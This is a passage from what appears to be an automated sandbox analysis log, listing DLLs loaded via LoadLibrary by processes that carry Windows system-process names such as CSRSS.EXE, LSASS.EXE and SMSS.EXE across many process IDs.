\"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002756)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005064)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005064)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005064)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005064)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005064)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005064)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005064)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005064)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005064)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005064)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005064)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005216)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005216)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005216)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005216)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005216)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005216)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005216)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005216)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005216)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005216)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005216)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005216)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005216)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005060)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005052)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005052)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005052)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005052)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005052)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005052)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005116)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004768)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004768)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004768)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004768)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004768)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004768)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004768)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004768)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004768)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004768)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004716)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004716)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004716)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001340)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001340)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001340)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001340)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001340)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001340)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002904)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002904)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002904)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002904)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002904)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002904)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002904)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002904)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002904)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004120)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004120)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004120)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004120)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004120)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004120)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004120)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004120)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004120)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004120)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005240)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005136)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005136)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005136)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005136)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005136)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005136)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005404)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005404)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005404)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005404)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005404)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005404)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005404)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005404)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005344)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005344)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005344)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003420)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003420)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003420)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003420)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003420)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003420)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003420)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003420)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003420)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002648)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002648)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002648)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002648)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002648)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002648)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002648)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002648)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005412)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005412)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005412)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005412)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005412)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005412)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005296)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005296)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005296)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005296)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005296)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005296)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005172)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005172)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003288)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003288)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003288)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003288)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003288)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003288)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003288)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003288)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003288)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005548)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005548)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005548)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005548)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005548)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005548)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005132)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005868)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005868)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005868)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005868)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005868)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005868)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005868)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005868)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005868)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005940)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005940)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005940)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005940)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005940)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004276)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004276)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004276)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004276)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004276)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004276)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004276)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004276)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004276)\n 